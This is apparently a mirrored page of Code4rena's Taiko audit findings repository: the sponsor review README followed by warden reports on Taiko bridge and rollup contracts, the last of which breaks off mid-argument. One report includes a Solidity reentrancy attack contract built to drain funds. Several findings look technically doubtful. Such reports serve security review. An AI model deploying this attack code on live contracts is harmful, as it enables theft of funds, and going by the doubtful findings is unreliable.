GithubHelp home page GithubHelp logo

2024-03-taiko-findings's Introduction

Taiko Audit

Unless otherwise discussed, this repo will be made public after audit completion, sponsor review, judging, and issue mitigation window.

Contributors to this repo: prior to report publication, please review the Agreements & Disclosures issue.


Audit findings are submitted to this repo

Sponsors have three critical tasks in the audit process:

  1. Respond to issues.
  2. Weigh in on severity.
  3. Share your mitigation of findings.

Let's walk through each of these.

High and Medium Risk Issues

Wardens submit issues without seeing each other's submissions, so keep in mind that there will always be findings that are duplicates. For all issues labeled 3 (High Risk) or 2 (Medium Risk), these have been pre-sorted for you so that there is only one primary issue open per unique finding. All duplicates have been labeled duplicate, linked to a primary issue, and closed.

Judges have the ultimate discretion in determining validity and severity of issues, as well as whether/how issues are considered duplicates. However, sponsor input is a significant criterion.

Respond to issues

For each High or Medium risk finding that appears in the dropdown at the top of the chrome extension, please label as one of these:

  • sponsor confirmed, meaning: "Yes, this is a problem and we intend to fix it."
  • sponsor disputed, meaning either: "We cannot duplicate this issue" or "We disagree that this is an issue at all."
  • sponsor acknowledged, meaning: "Yes, technically the issue is correct, but we are not going to resolve it for xyz reasons."

Add any necessary comments explaining your rationale for your evaluation of the issue.

Note that when the repo is public, after all issues are mitigated, wardens will read these comments; they may also be included in your C4 audit report.

Weigh in on severity

If you believe a finding is technically correct but disagree with the listed severity, select the disagree with severity option, along with a comment indicating your reasoning for the judge to review. You may also add questions for the judge in the comments. (Note: even if you disagree with severity, please still choose one of the sponsor confirmed or sponsor acknowledged options as well.)

For a detailed breakdown of severity criteria and how to estimate risk, please refer to the judging criteria in our documentation.

QA reports, Gas reports, and Analyses

All warden submissions in these three categories are submitted as bulk listings of issues and recommendations:

  • QA reports include all low severity and non-critical findings from an individual warden.
  • Gas reports include all gas optimization recommendations from an individual warden.
  • Analyses contain high-level advice and review of the code: the "forest" to individual findings' "trees.”

For QA reports, Gas reports, and Analyses, sponsors are not required to weigh in on severity or risk level. We ask that sponsors:

  • Leave a comment for the judge on any reports you consider to be particularly high quality. (These reports will be awarded on a curve.)
  • For QA and Gas reports only: add the sponsor disputed label to any reports that you think should be completely disregarded by the judge, i.e. the report contains no valid findings at all.

Once labelling is complete

When you have finished labelling findings, drop the C4 team a note in your private Discord backroom channel and let us know you've completed the sponsor review process. At this point, we will pass the repo over to the judge to review your feedback while you work on mitigations.

Share your mitigation of findings

Note: this section does not need to be completed in order to finalize judging. You can continue work on mitigations while the judge finalizes their decisions and even beyond that. Ultimately we won't publish the final audit report until you give us the OK.

For each finding you have confirmed, you will want to mitigate the issue before the contest report is made public.

If you are planning a Code4rena mitigation review:

  1. In your own Github repo, create a branch based off of the commit you used for your Code4rena audit, then
  2. Create a separate Pull Request for each High or Medium risk C4 audit finding (e.g. one PR for finding H-01, another for H-02, etc.)
  3. Link the PR to the issue that it resolves within your contest findings repo.

Most C4 mitigation reviews focus exclusively on reviewing mitigations of High and Medium risk findings. Therefore, QA and Gas mitigations should be done in a separate branch. If you want your mitigation review to include QA or Gas-related PRs, please reach out to C4 staff and let’s chat!

If several findings are inextricably related (e.g. two potential exploits of the same underlying issue, etc.), you may create a single PR for the related findings.

If you aren’t planning a mitigation review

  1. Within a repo in your own GitHub organization, create a pull request for each finding.
  2. Link the PR to the issue that it resolves within your contest findings repo.

This will allow for complete transparency in showing the work of mitigating the issues found in the contest. If the issue in question has duplicates, please link to your PR from the open/primary issue.

2024-03-taiko-findings's People

Contributors

c4-bot-10 avatar c4-bot-2 avatar c4-bot-5 avatar c4-bot-4 avatar c4-bot-1 avatar c4-bot-9 avatar c4-bot-6 avatar c4-bot-7 avatar c4-bot-8 avatar c4-bot-3 avatar thebrittfactor avatar code423n4 avatar c4-judge avatar

Stargazers

 avatar maryam avatar  avatar

Watchers

Ashok avatar  avatar

2024-03-taiko-findings's Issues

refundTo to inaccessible address

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L294-L295

Vulnerability details

Impact

processMessage() is called on the destination chain, sending the signal is on the source chain. The code specifies refundTo == msg.sender as a condition. However, the msg.sender address will not be controllable by contracts on L2, so any refund, or the bridged ETH amount in case of a failed transaction, will be lost.

Proof of Concept

// Refund the processing fee
if (msg.sender == refundTo) {// @audit
    refundTo.sendEther(_message.fee + refundAmount);
           } else {
    // If sender is another address, reward it and refund the rest
         msg.sender.sendEther(_message.fee);
         refundTo.sendEther(refundAmount);
           }

Tools Used

manual review

Recommended Mitigation Steps

specify destOwner in the condition

Assessed type

Other

Bridge::sendMessage() does not update the message status

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L115-L152

Vulnerability details

Impact

The sendMessage() function of the bridge does not insert the status in the mapping maintained by the bridge contract. Due to which, if looked for msg hash in the messageStatus, will return the default value of 0, which is mapped to NEW in the status enum.

     mapping(bytes32 msgHash => Status status) public messageStatus;

But, every msg submitted to the bridge should have a status record for proper tracking of the messages sent. It is working because of the conditions aligned that New and default status as 0 are same.

Proof of Concept

The sendMessage function should mark the msgHash as new as below.

   msgHash_ = hashMessage(message_);
 ===>  missing  "messageStatus[msgHash] = Status.NEW;"
   ISignalService(resolve("signal_service", false)).sendSignal(msgHash_);

Tools Used

Manual review

Recommended Mitigation Steps

   msgHash_ = hashMessage(message_);
   messageStatus[msgHash] = Status.NEW;
   ISignalService(resolve("signal_service", false)).sendSignal(msgHash_);

Assessed type

Other

GAP variable inconsistency in Bridge.sol

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/IBridge.sol#L60-L64
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L29-L48

Vulnerability details

Impact

Possible storage collision
Impact - High
Chances - Low to medium
Severity - medium

Proof of Concept

__gap variable is used in upgradeble contracts to ensure that any new variable if added in parent or child contract does not collide with any other previously used storage slot. Hence its size must clearly defined, which Taiko contracts do except in Bridge.sol , in the mentioned file they have assumed that Context struct uses 3 slots but it only uses 2 slots.

    struct Context {
        bytes32 msgHash; // Message hash.
        address from; // 20 bytes
        uint64 srcChainId; ///@audit 8 bytes , 20 + 8 bytes will be packed in 1 slot
    }

This wrong assumption has lead to incorrect allotment size to __gap array, which should be 44 instead of 43.

It can also be verified by running

forge inspect contracts/bridge/Bridge.sol:Bridge storage --pretty

Tools Used

Manual Review

Recommended Mitigation Steps

    /// @notice The next message ID.
    /// @dev Slot 1.
    uint128 public nextMessageId;

    /// @notice Mapping to store the status of a message from its hash.
    /// @dev Slot 2.
    mapping(bytes32 msgHash => Status status) public messageStatus;

--    /// @dev Slots 3, 4, and 5.
++    /// @audit Slots 3,4
    Context private __ctx;

    /// @notice Mapping to store banned addresses.
--    /// @dev Slot 6.
++    /// @audit slot 5
    mapping(address addr => bool banned) public addressBanned;

    /// @notice Mapping to store the proof receipt of a message from its hash.
--    /// @dev Slot 7.
++    /// @audit slot 6
    mapping(bytes32 msgHash => ProofReceipt receipt) public proofReceipt;

--    uint256[43] private __gap;
++    uint256[44] private __gap;

Some real world hacks and previous findings explaining why consistent gap size is important-
audius hack , finding 1 , finding 2

Assessed type

Upgradable

Method ERC20Vault::changeBridgedToken() will never be executed

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L158

Vulnerability details

Impact

It is impossible to remap canonical token to another bridge token.

Detailed description

It is not possible to create a bridge token without instantiating the CanonicalERC20 structure and mapping them together, since this happens in one place, in the _deployBridgedToken method:

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L407

Mappings is here:

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L422-L423

However, in the method ERC20Vault::changeBridgedToken(), in the line

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L158

there is a check bridgedToCanonical[_btokenNew].addr != address(0) that corresponded canonical token must not exist in the mapping bridgedToCanonical for a bridge token.
So, execution of the method ERC20Vault::changeBridgedToken() will be reverted.

Proof of Concept

You can use the protocol's own test suite to run this PoC.

Copy and paste the snippet below into the ERC20Vault.t.sol test file.
Run it with forge test -vv --match-test test_changeBridgedToken_Failed

function test_changeBridgedToken_Failed() public {
    // All this code bellow and till the line vm.prank(Carol) is needed 
    // to create two pears of canonical and bridge tokens

    vm.chainId(destChainId);        
    destChainIdBridge.setERC20Vault(address(destChainIdERC20Vault));

    // Create first canonical token
    FreeMintERC20 erc20x1 = new FreeMintERC20("ERC20X", "ERC20X");
    ERC20Vault.CanonicalERC20 memory ctoken1 = ERC20Vault.CanonicalERC20({
        chainId: srcChainId,
        addr: address(erc20x1),
        decimals: erc20x1.decimals(),
        symbol: erc20x1.symbol(),
        name: erc20x1.name()
    });

    // Create first bridge token
    destChainIdBridge.sendReceiveERC20ToERC20Vault(
        ctoken1,
        Alice,
        Bob,
        1,
        bytes32(0),
        address(erc20Vault),
        srcChainId,
        0.1 ether
    );

    // Get address of the first bridge token
    address btoken1 = destChainIdERC20Vault.canonicalToBridged(ctoken1.chainId, ctoken1.addr);

    // Create second canonical token
    FreeMintERC20 erc20x2 = new FreeMintERC20("ERC20X", "ERC20X");
    ERC20Vault.CanonicalERC20 memory ctoken2 = ERC20Vault.CanonicalERC20({
        chainId: srcChainId,
        addr: address(erc20x2),
        decimals: erc20x2.decimals(),
        symbol: erc20x2.symbol(),
        name: erc20x2.name()
    });

    // Create second bridge token
    destChainIdBridge.sendReceiveERC20ToERC20Vault(
        ctoken2,
        Alice,
        Bob,
        1,
        bytes32(0),
        address(erc20Vault),
        srcChainId,
        0.1 ether
    );

    // Get address of the second bridge token
    address btoken2 = destChainIdERC20Vault.canonicalToBridged(ctoken2.chainId, ctoken2.addr);

    vm.prank(Carol);
    vm.expectRevert(ERC20Vault.VAULT_INVALID_NEW_BTOKEN.selector);
    
    destChainIdERC20Vault.changeBridgedToken(ctoken1, btoken2);
}

Tools Used

Manual review, Foundry

Recommended Mitigation Steps

I would recommend removing this check bridgedToCanonical[_btokenNew].addr != address(0).
But, this method has more errors, like this:

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L180

and they have to be fixed.

Assessed type

Invalid Validation

`block.number` means different things on different L2s

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/L1/hooks/AssignmentHook.sol#L86-L86
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/L1/libs/LibProposing.sol#L122-L122
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L1/libs/LibProposing.sol#L131-L131
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L1/libs/LibProposing.sol#L204-L204
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L1/libs/LibProposing.sol#L220-L220
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L1/libs/LibVerifying.sol#L57-L57
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L86-L86
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L88-L88
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L90-L90
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L97-L97
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L118-L118
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L127-L127
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L201-L201
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol///contracts/L2/TaikoL2.sol#L202-L202

Vulnerability details

Impact

On Optimism, block.number is the L2 block number, but on Arbitrum, it's the L1 block number, and ArbSys(address(100)).arbBlockNumber() must be used. Furthermore, L2 block numbers often occur much more frequently than L1 block numbers (any may even occur on a per-transaction basis), so using block numbers for timing results in inconsistencies, especially when voting is involved across multiple chains.

Proof of Concept

File: /contracts/L1/hooks/AssignmentHook.sol

86:                 || assignment.maxProposedIn != 0 && block.number > assignment.maxProposedIn

link

File: /contracts/L1/libs/LibProposing.sol

122:                 l1Hash: blockhash(block.number - 1),

131:                 l1Height: uint64(block.number - 1),

204:         meta_.difficulty = keccak256(abi.encodePacked(block.prevrandao, b.numBlocks, block.number));

220:             proposedIn: uint64(block.number),

link , link, link, link

File: /contracts/L1/libs/LibVerifying.sol

57:         _state.slotA.genesisHeight = uint64(block.number);

link

File: /contracts/L2/TaikoL2.sol

86:         if (block.number == 0) {

88:         } else if (block.number == 1) {

90:             uint256 parentHeight = block.number - 1;

97:         (publicInputHash,) = _calcPublicInputHash(block.number);

118:                 || (block.number != 1 && _parentGasUsed == 0)

127:             parentId = block.number - 1;

201:         if (_blockId >= block.number) return 0;

202:         if (_blockId + 256 >= block.number) return blockhash(_blockId);

link , link, link, link, link, link, link, link

Recommended Mitigation Steps

As of version 4.9, OpenZeppelin has modified their governor code to use a clock rather than block numbers, to avoid these sorts of issues, but this still requires that the project implement a clock for each L2.

Assessed type

Other

QA Report

See the markdown file with the details of this report here.

Return values for transfer and transferFrom are not checked in LibProving::_overrideWithHigherProof() function

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/libs/LibProving.sol#L350-L398

Vulnerability details

Impact

A call to transfer/transferFrom without checking the results is vulnerable to incorrect accounting.If insufficient tokens are present, no revert occurs but a result of "false" is returned. So its important to check this. If you don't you could mint tokens without have received sufficient tokens to do so. So you could loose funds.

Its also a best practice to check this.

Proof of Concept

Refer to the code snippet where there are number of occasions where return value for transfer and transferFrom were not checked.

function _overrideWithHigherProof(
        TaikoData.TransitionState storage _ts,
        TaikoData.Transition memory _tran,
        TaikoData.TierProof memory _proof,
        ITierProvider.Tier memory _tier,
        IERC20 _tko,
        bool _sameTransition
    )
        private
    {
        // Higher tier proof overwriting lower tier proof
        uint256 reward;

        if (_ts.contester != address(0)) {
            if (_sameTransition) {
                // The contested transition is proven to be valid, contestor loses the game
                reward = _ts.contestBond >> 2;
                _tko.transfer(_ts.prover, _ts.validityBond + reward);
            } else {
                // The contested transition is proven to be invalid, contestor wins the game
                reward = _ts.validityBond >> 2;
                _tko.transfer(_ts.contester, _ts.contestBond + reward);
            }
        } else {
            if (_sameTransition) revert L1_ALREADY_PROVED();
            // Contest the existing transition and prove it to be invalid
            reward = _ts.validityBond >> 1;
            _ts.contestations += 1;
        }

        unchecked {
            if (reward > _tier.validityBond) {
                _tko.transfer(msg.sender, reward - _tier.validityBond);
            } else {
                _tko.transferFrom(msg.sender, address(this), _tier.validityBond - reward);
            }
        }

        _ts.validityBond = _tier.validityBond;
        _ts.contestBond = 1; // to save gas
        _ts.contester = address(0);
        _ts.prover = msg.sender;
        _ts.tier = _proof.tier;

        if (!_sameTransition) {
            _ts.blockHash = _tran.blockHash;
            _ts.stateRoot = _tran.stateRoot;
        }
    }

Tools Used

Manual review

Recommended Mitigation Steps

Check for return value for each of the transfer and transferFrom calls and revert incase the call returns false.

Assessed type

Token-Transfer

Possible Misinterpretation of Token Origins

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/tokenvault/BridgedERC1155.sol#L121-L123

Vulnerability details

Impact

The potential misinterpretation of token origins due to the discrepancy between the inclusion of the source chain ID in the token name but not in the symbol could lead to confusion among users and applications relying on symbol-based identification of tokens.

Proof of Concept

In the provided contract, the name() function retrieves the name of the bridged token by calling LibBridgedToken.buildName(__name, srcChainId), where both the __name and srcChainId parameters are passed. This indicates that the name includes information about the source chain ID, allowing for differentiation of tokens from various chains.

However, the symbol() function simply calls LibBridgedToken.buildSymbol(__symbol) without passing the srcChainId parameter. As a result, the symbol does not incorporate information about the source chain ID.

This design discrepancy could lead to a misinterpretation of token origins. For instance, if tokens from different chains share the same symbol but have different source chain IDs, users relying solely on the symbol might incorrectly assume that tokens with the same symbol originate from the same chain.

Tools Used

Manual

Recommended Mitigation Steps

Consider modifying the symbol() function to include the source chain ID. By passing the srcChainId parameter alongside __symbol to LibBridgedToken.buildSymbol(), the symbol can reflect both the token's identity and its originating chain.

Assessed type

Context

Missing Pause check in TaikoToken::_beforeTokenTransfer()

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/b6885955903c4ec6a0d72ebb79b124c6d0a1002b/packages/protocol/contracts/L1/TaikoToken.sol#L83

Vulnerability details

Summary

Throughout the protocol, whenNotPaused modifier is used in the _beforeTokenTransfer() function to ensure that token transfers are only allowed when the contract is not paused. The rationale behind this is to maintain the integrity and security of the contract during periods when it might be necessary to temporarily halt all token transfers.

However, in TaikoToken contract, this modifier is not used on _beforeTokenTransfer().

Proof of Concept

This modifier in used everywhere throughout the protocol in the following contracts that implement _beforeTokenTransfer():

However, in TaikoToken::_beforeTokenTransfer(), this is omitted.

    function _beforeTokenTransfer(
        address _from,
        address _to,
        uint256 _amount
    )
        internal
        override(ERC20Upgradeable, ERC20SnapshotUpgradeable)
    {
        super._beforeTokenTransfer(_from, _to, _amount);
    }

Impact

In case where the governance wants to stop all activity, they still can't stop transferring tokens.

Here is an example where stopping transferring tokens was actually very helpful: https://mobile.twitter.com/flashfish0x/status/1466369783016869892

Tools Used

Manual Review

Recommended Mitigation Steps

Add whenNotPasued modifier to _beforeTokenTransfer():

    function _beforeTokenTransfer(
        address _from,
        address _to,
        uint256 _amount
    )
        internal
        whenNotPasued
        override(ERC20Upgradeable, ERC20SnapshotUpgradeable)
    {
        super._beforeTokenTransfer(_from, _to, _amount);
    }

Assessed type

Other

QA Report

See the markdown file with the details of this report here.

Analysis

See the markdown file with the details of this report here.

L2 Coinbase receives lower eth deposit fee in a future block

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/L1/libs/LibDepositing.sol#L109

Vulnerability details

Impact

Fee collected from eth deposits is received by L2 coinbase later than possible and also lower than the maximum.

Proof of Concept

When processing eth deposits in LibDepositing.processDeposits(), fee collected for L2 coinbase from deposits is stored in ethDeposits array to be processed in future (LibDepositing.sol#L109):

// This is the fee deposit
_state.ethDeposits[_state.slotA.numEthDeposits % _config.ethDepositRingBufferSize] =
    _encodeEthDeposit(_feeRecipient, totalFee);

This deposit is processed in future blocks as the current block only processes deposits until some index before numEthDeposits (considering ring buffer). This has two effects:

  • This delays the rewards coinbase can get. If this fee is processed in the same block, coinbase receives the fee earlier, also removes the dependency on future block's basefee. This can become important since market is inherently volatile or when coinbase needs the fee immediately for more incentivization.
  • Also, this creates a cycle where in the future block where this fee is processed, the proposer of that future block takes a fee from this (LibDepositing.sol#L101):
uint96 _fee = deposits_[i].amount > fee ? fee : deposits_[i].amount;

...
unchecked {
    deposits_[i].amount -= _fee;
    totalFee += _fee;

A portion of this new totalFee again goes to the block even more into the future, creating a cycle.

Thus, a portion of the fee collected keeps on going to the future block proposers which should have gone to the current block propser.

Recommended Mitigation Steps

Process fee deposit in the same block by adding it to the deposits_ array returned by the function instead of adding it to ethDeposits storage array.

Assessed type

ETH-Transfer

Double Withdrawal Exploit: Reentrancy Vulnerability in TaikoL2.sol

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L2/TaikoL2.sol#L161-L178

Vulnerability details

Impact

  1. Double Withdrawals: The primary impact of this vulnerability is that it allows an attacker to double the withdrawals from the TaikoL2 contract. This is achieved by exploiting the reentrancy vulnerability in the withdraw function, which allows the attacker to recursively call the withdraw function before the state changes are made, leading to multiple withdrawals.

  2. Loss of Funds: For the TaikoL2 contract, this vulnerability could lead to a significant loss of funds. If an attacker can exploit this vulnerability, they could potentially drain the contract's balance, affecting the contract's functionality and the trust of users in the contract.

Proof of Concept

To demonstrate a Proof of Concept (POC) for the reentrancy vulnerability in the withdraw function of TaikoL2.sol, we'll create a malicious contract that exploits this vulnerability. This POC will illustrate how an attacker could potentially double withdrawals by calling the withdraw function in the fallback function of their malicious contract.

Step 1: Create the Malicious Contract

First, we'll create a malicious contract that will exploit the reentrancy vulnerability in the withdraw function. This contract will have a fallback function that calls the withdraw function of TaikoL2.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

import "./TaikoL2.sol";

contract MaliciousContract {
    TaikoL2 public taikoL2;
    address payable public attacker;

    constructor(TaikoL2 _taikoL2) {
        taikoL2 = _taikoL2;
        attacker = payable(msg.sender);
    }

    // Fallback function to exploit reentrancy
    fallback() external payable {
        if (address(taikoL2).balance >= msg.value) {
            taikoL2.withdraw{value: msg.value}(attacker);
        }
    }

    // Function to initiate the attack
    function attack() external payable {
        require(msg.value > 0, "Must send some Ether");
        taikoL2.withdraw{value: msg.value}(address(this));
    }

    // Function to withdraw the stolen Ether
    function withdraw() external {
        require(msg.sender == attacker, "Only the attacker can withdraw");
        payable(attacker).transfer(address(this).balance);
    }
}

Step 2: Deploy and Execute the Attack

  1. Deploy TaikoL2 and MaliciousContract: Deploy the TaikoL2 contract and the MaliciousContract with the address of the deployed TaikoL2 contract as a constructor argument.

  2. Initiate the Attack: Call the attack function of the MaliciousContract with some Ether. This will trigger the withdraw function of TaikoL2, which in turn will call the fallback function of the MaliciousContract.

  3. Observe the Reentrancy: The fallback function of the MaliciousContract will again call the withdraw function of TaikoL2, potentially leading to double withdrawals.

Recommended Mitigation Steps

To mitigate this reentrancy vulnerability, the withdraw function in TaikoL2.sol should use the Checks-Effects-Interactions pattern and consider using the reentrancyGuard modifier from OpenZeppelin's ReentrancyGuard contract. This ensures that all state changes are made before calling external contracts, preventing reentrancy attacks.

import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract TaikoL2 is CrossChainOwned, ReentrancyGuard {
    // Existing code...

    function withdraw(address _token, address _to)
        external
        onlyFromOwnerOrNamed("withdrawer")
        nonReentrant
        whenNotPaused
    {
        // Implementation...
    }
}

By adding the nonReentrant modifier to the withdraw function, we ensure that the function cannot be re-entered while it is still executing, thus mitigating the reentrancy vulnerability.

Assessed type

Reentrancy

Function Always Returns False

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L2/TaikoL2.sol#L220

Vulnerability details

Impact

The skipFeeCheck() function always returns false, which makes the returned value redundant. Although the returned value is not used actually in the caller, it is better to refactor it for better reading.

Recommended Mitigation Steps

We recommend correcting the return value.

Assessed type

Context

Bridge::sendMessage() ignores the ban address list from owner.

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L115-L152
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L101-L113

Vulnerability details

Impact

Bridge contract's sendMessage function does not restrict accepting message request from banned addresses maintained by bridge watchdog.

In the current implementation, there is no check of the source and destination address being in the ban address list.

As sendMessage() function is the origination of the communication between two chains over the bridge, incase of any banned address, the same should be effected at the time when party submits the request on one of the chains.

Due to which, the parties are able to submit the request even for addresses on the ban list which will revert during the later stage of processing.

Proof of Concept

Ban list map is maintained as below

     function banAddress(
        address _addr,
        bool _ban
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
        nonReentrant
    {
        if (addressBanned[_addr] == _ban) revert B_INVALID_STATUS();
        addressBanned[_addr] = _ban;
        emit AddressBanned(_addr, _ban);
    }

The sendMessage function not refer the ban mapping while accepting message from the caller.

Tools Used

Manual review.

Recommended Mitigation Steps

Check the src and destination before accepting the message in the sendMessage() function.

if (addressBanned[_message.srcOwner] || addressBanned[_message.destOwner]) {
revert B_INVALID_USER();
}

Assessed type

Invalid Validation

Wrong importing of library will by pass `isContract `check.

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/bridge/Bridge.sol#L4
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/libs/LibAddress.sol#L4

Vulnerability details

Impact

Wrong importing of library will easily by pass isContract check in Bridge contract and LibAddress.

Proof of Concept

Bridge._invokeMessageCall function will always pass the by pass the check used to ensure if the address is actually a contract or not due to wrong importing of library and due to which the check under this function will pass successfully even if the address is an EOA.

Bridge.sol#L493
if (
            _message.data.length >= 4 // msg can be empty
                && bytes4(_message.data) != IMessageInvocable.onMessageInvocation.selector
                && _message.to.isContract()
        )

here, the check _message.to.isContract() to ensure the to address should be a contract will always by pass,
and same check will always get by pass under LibAddress library due to the same reason that it imports wrong library.

LibAddress.sol#L54
if (!Address.isContract(_addr)) return false;

LibAddress.sol#L70
if (Address.isContract(_addr))

due to this reason all call passed in the above to mention library and contract could execute for EOA and not contract.

Tools Used

manual

Recommended Mitigation Steps

Make the changes as below,

LibAddress.sol#L4
-   import "@openzeppelin/contracts/utils/Address.sol";
+   import "@openzeppelin/contractsupgradeable/utils/AddressUpgradeable.sol"

LibAddress.sol#L54
-   if (!Address.isContract(_addr)) return false;
+   if (!AddressUpgradeable.isContract(_addr)) return false;

LibAddress.sol#L70
-   if (Address.isContract(_addr)) 
+   if (AddressUpgradeable.isContract(_addr)) 
Bridge.sol#L4
-      import "@openzeppelin/contracts/utils/Address.sol";
+      import "@openzeppelin/contractsupgradeable/utils/AddressUpgradeable.sol"

Bridge.sol#L17
-    using Address for address;
+    using AddressUpgradeable for address;

Assessed type

Error

Suspended messages can still be retried

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L82-L95

Vulnerability details

Description

The owner or the bridge watchdog can suspend multiple messages by calling suspendMessages:

    function suspendMessages(
        bytes32[] calldata _msgHashes,
        bool _suspend
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
    {
        uint64 _timestamp = _suspend ? type(uint64).max : uint64(block.timestamp);
        for (uint256 i; i < _msgHashes.length; ++i) {
            bytes32 msgHash = _msgHashes[i];
            proofReceipt[msgHash].receivedAt = _timestamp;
            emit MessageSuspended(msgHash, _suspend);
        }
    }

receivedAt gets set to type(uint64).max, which results in the following three functions to revert:

  • recallMessage
  • processMessage

In both these functions, when a message is suspended, this happens:

  • This bool gets set to true because receivedAt is type(uint64).max
        bool isMessageProven = receivedAt != 0;
  • Since isMessageProven is true, the next if-statement does not get executed:
        if (!isMessageProven) {
  • Since receivedAt is set to type(uint64).max, this next if-statement does not get executed:
        if (block.timestamp >= invocationDelay + receivedAt) {
  • Since isMessageProven is true, this else-if-statement does not get executed:
        } else if (!isMessageProven) {
  • This will always lead us to this last else-statement, causing these functions to revert:
        } else {
            revert B_INVOCATION_TOO_EARLY();
        }

This demonstrates that it should not possible to interact with suspended messages.

However, this is not the case for suspended retriable messages.
Consider the following:

  • message(1) is RETRIABLE
  • message(1) gets suspended by the bridge watchdog due to suspicious activity
  • However, it is still possible to retryMessage since nothing checks if receivedAt is set to type(uint64).max:
    function retryMessage(
        Message calldata _message,
        bool _isLastAttempt
    )
        external
        nonReentrant
        whenNotPaused
        sameChain(_message.destChainId)
    {
        if (_message.gasLimit == 0 || _isLastAttempt) {
            if (msg.sender != _message.destOwner) revert B_PERMISSION_DENIED();
        }
        bytes32 msgHash = hashMessage(_message);
        if (messageStatus[msgHash] != Status.RETRIABLE) {
            revert B_NON_RETRIABLE();
        }
        if (_invokeMessageCall(_message, msgHash, gasleft())) {
            _updateMessageStatus(msgHash, Status.DONE);
        } else if (_isLastAttempt) {
            _updateMessageStatus(msgHash, Status.FAILED);
        }
        emit MessageRetried(msgHash);
    }

The impact can be big, if a bridge watchdog manages to catch a suspicious transaction in their RETRIABLE status and suspends it, then the malicious user can still retry it and execute it.

Tools Used

Manual Review

Recommended Mitigation Steps

Inside retryMessage, check if the receivedAt value is set to type(uint64).max. If this is true, revert.

Assessed type

Context

Provable blocks can not be proved

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/TaikoL1.sol#L111-L114

Vulnerability details

Description

In TaikoL1.sol, the owner or an address with the name assigned "chain_pauser" can pause the proving by calling `pauseProving:

    function pauseProving(bool _pause) external {
        _authorizePause(msg.sender);
        LibProving.pauseProving(state, _pause);
    }

This halts the following two functions:

    function proveBlock(
        uint64 _blockId,
        bytes calldata _input
    )
        external
        nonReentrant
        whenNotPaused
->      whenProvingNotPaused
    {
	//..
	}

    function verifyBlocks(uint64 _maxBlocksToVerify)
        external
        nonReentrant
        whenNotPaused
->      whenProvingNotPaused
    {
	//..
	}

However, this can lead to cases where provable blocks won't be able to be proven anymore.

Proof of Concept

We will use block.timestamp in days, since the instance expiry of an SGX instance is notated in days:

    uint64 public constant INSTANCE_EXPIRY = 180 days;

Assume:

  • current block.timestamp = 179 days
  • _blockId == 10 has validSince set to 0, it will expire when 0 + INSTANCE_EXPIRY = 180 days.
  • Proving gets paused at 179 days by the owner.
    • It is currently impossible to prove any blocks with_blockId due to the whenProvingNotPaused modifier.
  • Alice tries to prove _blockId == 10 but can't due to the modifier.
  • At 181 days the proving will be unpaused.
  • Alice can call proveBlock, but the prove will fail because of this if-statement
